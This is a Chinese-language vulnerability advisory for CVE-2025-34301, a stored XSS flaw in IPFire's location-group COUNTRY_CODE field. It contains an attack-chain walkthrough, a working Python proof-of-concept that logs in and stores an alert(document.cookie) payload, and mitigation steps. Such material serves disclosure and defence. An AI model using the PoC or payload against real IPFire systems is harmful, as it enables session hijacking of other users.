CVE-2025-34301 IPFire存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-34301

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

IPFire

漏洞概述

CVE-2025-34301是IPFire防火墙产品中的一个存储型跨站脚本（Stored XSS）安全漏洞。该漏洞存在于IPFire 2.29（Core Update 198）之前的版本中，攻击者可以利用此漏洞在Web界面中注入恶意JavaScript代码。具体而言，当用户创建位置组（location group）时，应用程序会通过HTTP POST请求将ACTION参数设置为savelocationgrp，同时COUNTRY_CODE参数的值决定了该位置组显示的国旗图标。攻击者可以在COUNTRY_CODE参数中注入恶意脚本代码，这些代码会被存储在服务器端并在后续被其他用户访问时执行。由于该漏洞是存储型XSS，恶意代码会持久化在系统中，每次有用户访问相关页面时都会触发执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重安全问题。攻击者需要具有低权限的认证账号即可实施攻击，但需要诱导其他用户进行交互操作才能完成完整的攻击链。

技术细节

该漏洞的根本原因在于IPFire的Web应用程序在处理用户输入时缺乏适当的输入验证和输出编码。具体技术细节如下：1. 漏洞位置：当通过Web界面创建新的位置组时，应用程序会向服务器发送HTTP POST请求，请求中包含ACTION=savelocationgrp和COUNTRY_CODE等参数。2. 数据流程：COUNTRY_CODE参数的值被直接存储到数据库中，用于标识和显示位置组的国旗信息。3. 触发点：当其他用户访问位置组管理页面或相关功能时，存储的COUNTRY_CODE值会被从数据库中取出并直接渲染到HTML页面中。4. 漏洞成因：应用程序在将COUNTRY_CODE值输出到HTML页面时，没有进行适当的HTML转义或编码处理，导致攻击者可以注入任意HTML标签和JavaScript脚本。5. 利用条件：攻击者需要拥有一个有效的低权限用户账号，登录后访问位置组创建功能，在COUNTRY_CODE字段中注入恶意JavaScript代码（如：<script>alert(document.cookie)</script>）。6. 影响范围：由于存储型XSS的特性，恶意代码会在所有访问该页面的用户浏览器中执行，影响范围覆盖所有查看该位置组信息的用户。

攻击链分析

STEP 1

步骤1

攻击者获取IPFire系统的低权限用户账号并登录到Web管理界面

STEP 2

步骤2

攻击者访问位置组创建功能页面，准备构造恶意请求

STEP 3

步骤3

攻击者构造包含XSS payload的HTTP POST请求，将ACTION参数设置为savelocationgrp，在COUNTRY_CODE参数中注入恶意JavaScript代码

STEP 4

步骤4

应用程序将COUNTRY_CODE参数值未经过滤直接存储到数据库中

STEP 5

步骤5

当其他用户访问位置组管理页面时，存储的恶意代码被从数据库取出并直接渲染到HTML中

STEP 6

步骤6

受害用户的浏览器执行注入的恶意JavaScript代码，导致Cookie会话信息被窃取或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-34301 PoC - IPFire Stored XSS via Location Group Creation
import requests
import sys
from urllib.parse import quote

# Configuration
target_url = "http://TARGET_IP:444/"
username = "attacker"
password = "password"

# Login to IPFire
session = requests.Session()
login_data = {
    "username": username,
    "password": password
}

try:
    # Step 1: Authenticate
    response = session.post(f"{target_url}cgi-bin/login.cgi", data=login_data, timeout=10)
    
    # Step 2: Create location group with XSS payload in COUNTRY_CODE
    xss_payload = '<script>alert(document.cookie)</script>'
    exploit_data = {
        "ACTION": "savelocationgrp",
        "COUNTRY_CODE": xss_payload,
        "LOCATION_GRP_NAME": "TestGroup"
    }
    
    response = session.post(f"{target_url}cgi-bin/locationgroups.cgi", data=exploit_data, timeout=10)
    
    print("[+] XSS payload sent successfully!")
    print(f"[+] Payload: {quote(xss_payload)}")
    print("[+] Any user viewing the location group page will trigger the XSS")
    
    # Step 3: Verify the stored XSS
    verify_response = session.get(f"{target_url}cgi-bin/locationgroups.cgi", timeout=10)
    if xss_payload in verify_response.text:
        print("[+] XSS payload successfully stored and reflected in response")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")
    sys.exit(1)

影响范围

IPFire < 2.29 (Core Update 198)

防御指南

临时缓解措施

如果无法立即升级到最新版本，可以采取以下临时缓解措施：1. 限制Web管理界面的访问权限，仅允许受信任的管理员访问；2. 监控和审查位置组相关功能的访问日志；3. 对COUNTRY_CODE等输入字段实施白名单过滤，仅允许有效的国家代码格式；4. 在Web代理层面实施输入过滤规则，拦截包含可疑脚本标签的请求；5. 提醒用户不要点击来源不明的链接，特别是管理界面中的链接。